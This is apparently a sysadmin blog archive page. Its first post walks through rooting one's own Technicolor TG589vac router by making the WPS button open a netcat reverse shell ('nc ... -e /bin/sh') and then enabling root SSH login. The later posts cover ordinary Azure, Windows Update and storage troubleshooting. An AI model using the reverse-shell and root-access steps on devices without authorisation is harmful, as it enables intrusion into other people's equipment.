Tuesday, 15 May 2018

LAN side root on Technicolor MediaAccess TG589vac

Here is a method for gaining root access to your Technicolor TG589vac (and probably other models of) router.

Unfortunately this will only work on European models that have SSH enabled with an engineer account enabled.



Tested working on firmware revision 17.2.0278

It's a bit more involved than the older methods but here goes:

First set up a machine listening with netcat (make a note of it's IP)

nc -lvvp 4444

Set up the WPS button to connect back to your listening machine. Log into the engineer account using SSH. Password is printed on the label as access code.

get uci.button.button.@wps.handler
set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh'
get uci.button.button.@wps.handler




Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top)

Congrats, you now have a root shell.




Once logged in you can set up root login via ssh. The following will read the passwd file, then modify the root shell from /bin/false to /bin/ash

cat /etc/passwd
sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd
cat /etc/passwd

Make sure the 2nd output of the passwd file has the correct root shell.

Next, configure dropbear to allow root login via SSH

uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit

You have to restart dropbear

/etc/init.d/dropbear restart

root password is root :)

Login via SSH, set new root password

root@dsldevice:~# passwd root
New password:
Retype password:
Password for root changed by root

Set WPS button back using UCI

uci set button.wps.handler='wps_button_pressed.sh'
uci commit







Monday, 12 March 2018

StorSimple Upload Calculator

Some time ago, I played around with the on-premise Azure StorSimple virtual appliance. Unfortunately, I happened to pick the new blob storage account in cool, RA-GRS mode. This happened to have a very expensive "per 10k write" cost and cost quite a bit of money when I uploaded 750 GiB of data.

Since then, we have seen Azure storage transaction costs come way down, especially on the v1 general purpose storage account type.

To help you get an estimate of storage and transaction costs for uploading bulk data into a StorSimple device, I've created a calculator here.

To begin, simply key in a GiB storage amount that you plan to upload, the per 10k write and per GB cost for your region and the calculator will give a guide to the expected transaction and storage cost to upload the data.





The calculator does not calculate transactions for day to day access, nor does it include cloud snapshot transactions or storage.

Be aware, the 512 KiB chunk size will reduce transaction costs, but will also significantly reduce deduplication. The Microsoft pricing page explains this.

This, version 1 of the calculator requires you to key in the per 10k writes and per GB cost for your chosen region and storage account type. It defaults to v1, LRS, North Europe, GBP costs as of the time of writing. I've purposely left out the currency symbol as it should work with most currencies as-is.

Hopefully with some additional time, I'll be able to add a pull-down box to choose storage account type and location and have it automatically enter those costs for you.

Thursday, 8 March 2018

Windows Server 2012 R2 & 2016 updates showing as not applicable

Due to Spectre and Meltdown patches causing problems with various anti virus vendors, Microsoft has added a registry key check for ALL patches on Windows Server for January and February 2018 (not just the Spectre and Meltdown patches)

If you find yourself in the situation where your severs are not detecting the latest update rollups then check this Microsoft post:

https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software

Most AV vendors are properly setting this flag in the registry, but some will not and if you have some servers which do not have AV for legitimate reasons you may find yourself unable to patch these machines.

The server will simply not show the update rollups from WSUS or Microsoft Update servers. In WSUS, they will show as 'not applicable' for the server.

Setting the flag resolves the issue, but unless you are checking that servers are getting updated properly this may not be noticed. In WSUS, since the updates are not applicable, the server will show as fully patched, not requiring the updates which is a bad situation to be in.

Friday, 9 February 2018

How to change backup retention for an Azure VM in Recovery Services Vault

This seemed a little bit hidden in the portal and I couldn't find any guides online. So, here is how to change the backup retention for an Azure virtual machine within the portal.

Hidden away here in the Azure Backup FAQ, Microsoft states:

"When a new policy is applied, schedule and retention of the new policy is followed. If retention is extended, existing recovery points are marked to keep them as per new policy. If retention is reduced, they are marked for pruning in the next cleanup job and subsequently deleted."

This means you will delete older backups when the policy is changed. Additionally, you keep existing backups according to your new policy.

How to change your policy

  • Log into the portal and find your Recovery Services Vault.


  • Click on the vault, then find 'Backup policies' in the menu blade.


  • Click '+ Add', select a policy type, fill in the policy details and click Create.


  • Once the policy is created, go back to the main Recovery Services Vault tab and click the vault.


  • Find 'Backup Items' in the menu blade.

 
  • Click Azure Virtual Machine.


  • Click on the VM you want to change.


  • Click the settings button.


  • Click 'Backup Policy'


  • Choose the new backup policy and click Save.

Once the Deployments show as succeeded in the notifications area, go back to the 'Backup policies' blade from the start, click the policy, then click 'Associated Items' to check that the correct virtual machines have been assigned this policy.

Friday, 24 November 2017

Azure Burstable VMs - Will it Burst?


Will it Burst?

Microsoft has announced it's new B-Series burstable VMs. These VMs look like a great option for low priority, low requirement VMs. If you're anything like me, you will look after a bunch of virtual machines that don't require much CPU most of the time and therefore paying for a dedicated core or cores on Azure seems expensive.


B-Series VMs allow your machine to sit idle for most of the day but burst up to the full core allocation for short periods. These VM SKUs are very affordable compared to the other VM series.


How then, do you know if your VM is idle enough to run in a burstable SKU? You could carefully check VM performance metrics for every virtual machine you own - or you could run this script to get a quick answer and then dive a bit deeper for those machines that look good.


Check out the repo on GitHub and read the description below to find out more.





Azure-Burst-Check

Script to check if your VM is applicable to a burstable VM size. Good for ensuring your VM is idle enough, for enough time that it could run as a burstable machine.

The script will load the VM diagnostics for a specified period and will then do some rudimentary checks to see if it could run in a burstable VM SKU. This script only looks at CPU usage on the host and the memory size of the input VM. It does not take in to account disk or any other resource constraints. Ensure the burstable size shown fits your other requirements before resizing the machine.


Additionally, the script assumes 25% utilisation on a 4-core VM is basically saturating a single core and would be OK on a 1-core VM. The script also assesses all cores as equal, which is not the case in reality - an Av1-Series core is considerably slower than a Dv2-Series core.


The output will show all burstable VM sizes and an applicability rating for the input VM as "Good fit", "Possible fit" and "Poor fit".


The Throttled column shows the amount of data points that would have caused throttling of the VM due to the machine running out of credits. This is a little misleading since if the machine was throttled then it would take longer to do it's work and likely throttle for longer than the figure shows. I would advise if there is any significant (>5%) throttling then the VM size is unsuitable unless the VM is very low priority.


If you do decide to switch to a burstable VM, then I would suggest applying an alert to the new credit metric to show when the VM is running with low credits and increase the VM size accordingly.


Charts





Example VM that is unsuitable for B1s SKU - Out of credits



Example VM that is suitable for B2s SKU

Thursday, 12 October 2017

Unable to create new files and folders on NAS share from HPE StoreOnce device. isFileExists

Issue


Unable to create new files and folders on NAS share from HPE StoreOnce device. May affect other windows SMB clone servers.

You see errors like the following in Windows Explorer:


Could not find this item
This is no longer located in <%3 Null:OpText>. Verify the item's location and try again.


There is a problem accessing \\server\sharename
Make sure you are connected to the network and try again.
sharename

You see errors like the following in Veeam Agent for Windows Backup log:


Error: The specified network name is no longer available. Failed to process [isFileExisits]

Cause


The Microsoft network client: digitally sign communications (always) policy setting is set to enabled

Resolution


Set the following policy to Disabled and reboot the machine.

Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Microsoft network client: Digitally sign communications (always)

Thursday, 17 August 2017

Azure CPU Price to Performance Roundup

I have recently been running some benchmarks on Azure Virtual Machines... Lots of benchmarks!

Update: Script published on GitHub here! This is not a finished product and is a bit "hacky" - you have been warned! :)

In fact, I've written a script which will power up each VM type that is available to me on an MSDN subscription and make it run Cinebench R15. My MSDN subscription has the default cores per region limit and therefore the largest machine I was able to test was the D15_v2 at 20-Cores.

The script ran the benchmark 3 times to try to account for time based variance such as background processes. I tried to minimise background processes by disabling Windows Update and Defender on the machine.

The time taken to run through all of the machine types available to me serially and run Cinebench 3 times was not as long as I initially expected - about 24 hours for a full run. Due to this, I'm open to running other benchmarks that can be run from the command line and will output in some standard fashion. I might do a strawpoll if anyone is interested.

Keep in mind that Cinebench only tests CPU performance, so this will not be relevant for other machine uses such as GPU or Disk IO.

Price to Performance

Price to performance for each VM series and CPU type was calculated by dividing the Cinebench score (average of 3 runs) by the price per month of the Virtual Machine. The results are displayed as an average score of all the VM types in the series. 




From the results, you can see that the F series VM is by far the best performing per pound spent. The defunct G series VM is the most expensive for CPU.


Real world Cinebench R15 results vs Microsoft 'Azure Compute Unit' figures

I have normalised the Cinebench per-core, per-thread and ACU scores for each VM type and then averaged the normalised value to each VM series.




The best performing per-core virtual machine type is the H series, using the Intel Xeon E5-2667 v3 Haswell at 3.2 GHz. 

Looking at the results shows that almost all of the CPUs (relative to the H series) perform similarly to their respective ACU score which means that the ACU is a good benchmark to gauge relative CPU performance by.

The only outlier on this chart is the Dv3 series when looking at per-core values. Since this VM is using Hyper-Threading, there are 2 threads per core and therefore it performs significantly better relative to the other non-SMT virtual machine types. This is however reflected in the pricing of the VM and so the H series is still top dog on CPU price to performance.

A final note

I have looked at the variance on per core and per thread scores (divide multi core score by number or cores / threads,) and the variance on all the VM types in a series is very low. The only noticeable difference is the G series, where the Cinebench R15 multi core score does not scale linearly. Per core scores go down as the VM size increases. It's probably worth investigating single core benchmarks on these machines to see if there is some artificial limiting happening or if this is due to Intel Turbo Boost kicking in on the CPU.





Let me know if you think there might be a good benchmark to run on the entire series of Azure VMs?

Here is a Google Sheet with all of my results. 

Here is the script

Dave.